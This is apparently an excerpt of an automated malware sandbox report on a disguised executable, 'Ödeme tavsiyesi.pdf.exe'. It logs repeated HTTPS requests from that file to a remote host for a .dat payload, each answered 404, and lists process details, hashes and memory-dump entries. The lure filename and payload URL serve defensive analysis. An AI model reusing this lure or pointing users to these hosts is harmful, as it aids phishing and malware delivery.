      2024-12-16 13:21:26 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      119192.168.2.750089185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:21:27 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:21:28 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:21:27 GMT
      vary: User-Agent
      2024-12-16 13:21:28 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      120192.168.2.750090185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:21:29 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:21:29 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:21:29 GMT
      vary: User-Agent
      2024-12-16 13:21:29 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      121192.168.2.750091185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:21:31 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:21:31 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:21:31 GMT
      vary: User-Agent
      2024-12-16 13:21:31 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      122192.168.2.750092185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:21:33 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:21:33 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:21:33 GMT
      vary: User-Agent
      2024-12-16 13:21:33 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      123192.168.2.750093185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:21:35 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:21:35 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:21:35 GMT
      vary: User-Agent
      2024-12-16 13:21:35 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      124192.168.2.750094185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:21:36 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:21:37 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:21:37 GMT
      vary: User-Agent
      2024-12-16 13:21:37 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      125192.168.2.750095185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:21:38 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:21:39 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:21:39 GMT
      vary: User-Agent
      2024-12-16 13:21:39 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      126192.168.2.750096185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:21:40 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:21:41 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:21:41 GMT
      vary: User-Agent
      2024-12-16 13:21:41 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      127192.168.2.750097185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:21:42 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:21:43 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:21:43 GMT
      vary: User-Agent
      2024-12-16 13:21:43 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      128192.168.2.750098185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:21:44 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:21:45 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:21:45 GMT
      vary: User-Agent
      2024-12-16 13:21:45 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      129192.168.2.750099185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:21:46 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:21:47 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:21:46 GMT
      vary: User-Agent
      2024-12-16 13:21:47 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      130192.168.2.750100185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:21:48 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:21:49 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:21:48 GMT
      vary: User-Agent
      2024-12-16 13:21:49 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Target ID:0
      Start time:08:17:41
      Start date:16/12/2024
      Path:C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      Wow64 process (32bit):true
      Commandline:"C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe"
      Imagebase:0x50000
      File size:6'144 bytes
      MD5 hash:9D1DFCF9EC726EFF98E8ECB0F7F38729
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:false

      Reset < >
        Memory Dump Source
        • Source File: 00000000.00000002.3712688964.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_680000_#U00d6deme tavsiyesi.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: f484b60c950ad31e8af5e9b607e2b0793e10e00438d67ea66c870c561c5ac38f
        • Instruction ID: a016e248b46aa8c541acfc1475826ab3ecf8fb20b03d3a55a169af68be74cb9d
        • Opcode Fuzzy Hash: f484b60c950ad31e8af5e9b607e2b0793e10e00438d67ea66c870c561c5ac38f
        • Instruction Fuzzy Hash: E01178E170C350EFFFD572745814A747BA3AB863117340FAAE0828B682D400A98F97F2
        Memory Dump Source
        • Source File: 00000000.00000002.3712688964.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_680000_#U00d6deme tavsiyesi.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 1dc0a41880f4e29c0a17564f612117cc3272d4efcdc2a585d140f60c453f3eb1
        • Instruction ID: 228c9fc4ff74243ae0942cb04414466433f6b08ae923081d432a329766e07133
        • Opcode Fuzzy Hash: 1dc0a41880f4e29c0a17564f612117cc3272d4efcdc2a585d140f60c453f3eb1
        • Instruction Fuzzy Hash: CA213034A44214CFEB98EF64C0586AD7BF3AF4C310F249955D106AB366CA319C4ADB61
        Memory Dump Source
        • Source File: 00000000.00000002.3712688964.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_680000_#U00d6deme tavsiyesi.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 3f0f01b053cce5bfce781c9abdc3fe1db3c6989cd1a88b5d12661454a63781bb
        • Instruction ID: 56ab789d5643f7f530d2df086e7d452a1f95bdf890e4727fc81356295940c231
        • Opcode Fuzzy Hash: 3f0f01b053cce5bfce781c9abdc3fe1db3c6989cd1a88b5d12661454a63781bb
        • Instruction Fuzzy Hash: 17F0C2A0B48200DFFED872685414A3526676BC8750B300E6AE403DBB90C9508CCBA7E2
        Memory Dump Source
        • Source File: 00000000.00000002.3712688964.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_680000_#U00d6deme tavsiyesi.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: d5af5e00425b74e6e323a49f30b9754a67e5de3431b63a8b0438c7a3d54ec7a4
        • Instruction ID: 9be6c60476eb1ada62607118771c5725d2fb016207492a041e3749015ccb57d6
